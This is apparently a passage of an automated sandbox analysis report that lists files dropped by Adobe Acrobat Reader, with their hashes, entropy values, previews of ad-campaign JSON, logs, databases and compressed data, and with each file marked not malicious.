                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):286
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.264156951399076
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:YEQXJ2HX1BG8k/4nWsGiIPEeOF0YJqoAvJfshHHrPeUkwRe9:YvXKX1Dc4WsdTeOHGUUUkee9
                                                                                                                                                                                                                                                                                          MD5:F44563876FF0B501EA26A394A57CBAA5
                                                                                                                                                                                                                                                                                          SHA1:4B5E7BE4A3732233AB15277FC9E3883EEF3F2DBA
                                                                                                                                                                                                                                                                                          SHA-256:3DB66A72A4E33227AFF1E2EC8A3684840E5AF740705BCA6423B1CA306D909D8E
                                                                                                                                                                                                                                                                                          SHA-512:13AA51018559C69C80B0CB78AC1C9220BD5C26D86356661A949397419051D711708A09AE027134744E6FA6FFED092D298B38446DA2855C6F7737D6EBD5BB431E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):782
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.371989536132348
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YvXKX1Dc4WsdTeOHGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWl:Yv6X1Dc4WmeOH168CgEXX5kcIfANhs
                                                                                                                                                                                                                                                                                          MD5:60CFA74679A1B3D19533854015B50569
                                                                                                                                                                                                                                                                                          SHA1:0B9137A99EE8D3A6D51BC556788568D96937597C
                                                                                                                                                                                                                                                                                          SHA-256:7AD745C3A062D1D6AE00549D987A27D5EF59127CBCA6C4AA1434F1A7889AAF15
                                                                                                                                                                                                                                                                                          SHA-512:2A0F351F859FF573F4EE2AD4C8EFC81B465285B6098643EA3D6019E88484A94720B227A6DA96DC4370CCAD120D118371BF3AB56C3A38A4823E119931E2BAEC36
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c7dc865b-e8cb-4eb8-aba8-f6d3d749dd0e","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1727625707368,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1727448032396}}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:e:e
                                                                                                                                                                                                                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                                                                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                                                                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                                                                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2818
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1392764289733215
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YrzFFTaLPay6ny2HeC374mRjKZkBi0gjGYj0ScuI2SaP2LSGEhn5gQGh9S1IuiOG:Y9ZyV80mRjK2opGaEVaPsEhnIh90Q
                                                                                                                                                                                                                                                                                          MD5:1B9E2EAB55BAF897134C919DF32DC902
                                                                                                                                                                                                                                                                                          SHA1:A12855BC326A9B3EA0FB49122F278469B8CB2F52
                                                                                                                                                                                                                                                                                          SHA-256:9E41F595733FED1E1F93A83A0E25093FCCB35B907D4743ABD24C5163BDA35647
                                                                                                                                                                                                                                                                                          SHA-512:C85DA13AEA04F2411F919F9DA8CFC512BD5C2E51A3AFAE66DF995682D2EC20C8B4D4C6A29F3BECA141EE4FB135E5A56B1D6F7B3E4C7AD19104B04AF8FEA33A18
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"66542b67283d058b215c28954ff39176","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1727448031000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d7ffb52f3c6dc4462b149a0f44f1da52","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1727448031000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f7daa85b94a2c4f2d5c1b2b38f7d7ce3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1727448031000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7f8a91b0b17a1fbdbce331b5eb54b10a","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1727448031000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"20a0fb3a4ffeb28780ee9ef2ad2dcefc","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1727448031000},{"id":"Edit_InApp_Aug2020","info":{"dg":"9f99c540a992ae57fd41bedfd15ccbbf","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.4542472097117762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2ds9lb:lNVmsw3SHtbDbPe0K3+fDZd0
                                                                                                                                                                                                                                                                                          MD5:921F81E67C4BB50362C111117DDB0123
                                                                                                                                                                                                                                                                                          SHA1:FAA4EEB590802EB2DB746170E47FE9304C2FD0D3
                                                                                                                                                                                                                                                                                          SHA-256:AD2E35D427A9F457D6A9BECC95684834590EA67DCFBFA9051077E21DEF30C773
                                                                                                                                                                                                                                                                                          SHA-512:75F9F60C1680EAE10275282A72AAD75937845354C46185952B98B4E353A35C79AFFB53B3F5C935FA94CEDB3021416D2F9F3ED94C91763175FACB87890F6FE9F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.960256909540723
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:7MsrvrBd6dHtbGIbPe0K3+fDy2dsIzqFl2GL7msk:7V3SHtbDbPe0K3+fDZdZKVmsk
                                                                                                                                                                                                                                                                                          MD5:276E78985B63201A211972F6A8BBE56F
                                                                                                                                                                                                                                                                                          SHA1:34484CBC9B9DEA4F87E1F6655E40D6B020C27E64
                                                                                                                                                                                                                                                                                          SHA-256:E8ADD8C8FDDE146C19A5AE89DDC1196206514C7AAC39BCAE039F9B23533B1FC5
                                                                                                                                                                                                                                                                                          SHA-512:D0E24F63485DB9CF1B062F92928FD90DDC2C46F5A763905C9996F438FFB60FC047ADF7CA0EC4A62C7DBC4B3F29EEFA41411A58275A3BB897FAD6E4419E9719BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.... .c.......:^......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):246
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5081383324894926
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8UdN9w:Qw946cPbiOxDlbYnuRKQ
                                                                                                                                                                                                                                                                                          MD5:1831A2F8F40DE14049E92D27A7E9EC16
                                                                                                                                                                                                                                                                                          SHA1:FA0C826694668C61423CF474EF02892EF08AF744
                                                                                                                                                                                                                                                                                          SHA-256:EC28BB8469E6DD69D7D3F15042F2C690FDA250AC29AF711D50AA2BBFFCC57DB4
                                                                                                                                                                                                                                                                                          SHA-512:E3CEDB593CECE609195C80DA1A1D484AE99146DA54AACEF720F778DFE1FF529873D0E6792F9DF19BB2EC05E7404404BD149A739470960E14C94C297B4C976A9F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.0.9./.2.0.2.4. . .1.0.:.4.0.:.2.9. .=.=.=.....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16525
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.386483451061953
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                                                                                                                                                                                                                          MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                                                                                                                                                                                                                          SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                                                                                                                                                                                                                          SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                                                                                                                                                                                                                          SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):15114
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.32652281152888
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:FbyOwOvi4iyiRiB8iZiQiai5iFjiZiJi7vi+n+TLhLVm8949H9uQ9OBzBnBNUbC9:FOhQd5ou8cPfS2jMeUai4Npl+Zo1hB/f
                                                                                                                                                                                                                                                                                          MD5:7E52DD1D120665B6D69B54CB743A3C33
                                                                                                                                                                                                                                                                                          SHA1:CD2724EE16152D267F9F4C77BB7A32BD44FE5206
                                                                                                                                                                                                                                                                                          SHA-256:0DF93C4216FC4C6A8C390CC4758F520578DDE742FA83F4EFE72E8B17C16F8445
                                                                                                                                                                                                                                                                                          SHA-512:7AE68796C50CDF5BE8CA30788603EE9AD25EF96E7E52B9741C6A2AE6B3BA55121005CC5FFD95C351207E4AD22557480074097DFDD45A8F766349B91E50E53737
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SessionID=13783d66-646c-4756-97fa-3ea4077a8dac.1727448024278 Timestamp=2024-09-27T10:40:24:278-0400 ThreadID=7560 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=13783d66-646c-4756-97fa-3ea4077a8dac.1727448024278 Timestamp=2024-09-27T10:40:24:279-0400 ThreadID=7560 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=13783d66-646c-4756-97fa-3ea4077a8dac.1727448024278 Timestamp=2024-09-27T10:40:24:279-0400 ThreadID=7560 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=13783d66-646c-4756-97fa-3ea4077a8dac.1727448024278 Timestamp=2024-09-27T10:40:24:280-0400 ThreadID=7560 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=13783d66-646c-4756-97fa-3ea4077a8dac.1727448024278 Timestamp=2024-09-27T10:40:24:280-0400 ThreadID=7560 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):35721
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.410601915712715
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRM:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRi
                                                                                                                                                                                                                                                                                          MD5:62C8B299278184A234E8E5EB94783E4D
                                                                                                                                                                                                                                                                                          SHA1:759DBF4FACCA9E50D9FC714623311A47F54A7654
                                                                                                                                                                                                                                                                                          SHA-256:64577FEBD97BED44129CB6077BCC3EC489BE89B2682C00AEB34CC342013F8916
                                                                                                                                                                                                                                                                                          SHA-512:DAB8F7CFEEB88B40B4BD33AD9E701EAF5D095237CB2B83D6E239DF32580CB86201D4254D39D518477AD9818B44E3597CAFAFA3B6F057523DB434FE8A4334319D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1407294
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.97605879016224
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:/xbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07EGZftwYIGNPzWL07oW:Jb3mlind9i4ufFXpAXkrfUs0wGZVwZGf
                                                                                                                                                                                                                                                                                          MD5:0E1B199E77ACA01686FEB4EAEF72E148
                                                                                                                                                                                                                                                                                          SHA1:7C22D506ABC4B734E9491A833F78CBB2549356D7
                                                                                                                                                                                                                                                                                          SHA-256:46896E7C24B491E55815328A77A1F3FF6E9CBD6DAEFCD172F026B53320F934DE
                                                                                                                                                                                                                                                                                          SHA-512:EFEEDED8F81C340876293C5A63B3F1BEED952659B2DACCCC3ADD9868F6D6782484B29BE6720FD7F8E32B0A5CFF5C08CC31C2252A9AE20F0692A935AF0C263664
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):386528
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9736851559892425
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                                                                                                                                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                                                                                                                                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                                                                                                                                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                                                                                                                                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1419751
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.976496077007677
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:/nZwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:fZwZG5WLxYGZn3mlind9i4ufFXpAXkru
                                                                                                                                                                                                                                                                                          MD5:F43041C007C55C623135DD65EBCBE292
                                                                                                                                                                                                                                                                                          SHA1:0F5781369DB2C967A1795898030244B2E9D561F6
                                                                                                                                                                                                                                                                                          SHA-256:4F7827EA2E3ACAA6A1B5BC7969516DD8EF08AC789E9C5FBCE61A71D0553C2B8D
                                                                                                                                                                                                                                                                                          SHA-512:E5D1D615B902E4D66FD550BDF1418FE7D70BC08548EA006891F90CB183299D6700547205A3F2FEED6AE2C2F3A95B5F094356E4FB5451A36C4555CBFABE4D44F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):758601
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.98639316555857
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                                                                                                                                                                                                          MD5:3A49135134665364308390AC398006F1
                                                                                                                                                                                                                                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                                                                                                                                                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                                                                                                                                                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                                                                                                                                                                                                          Malicious:false
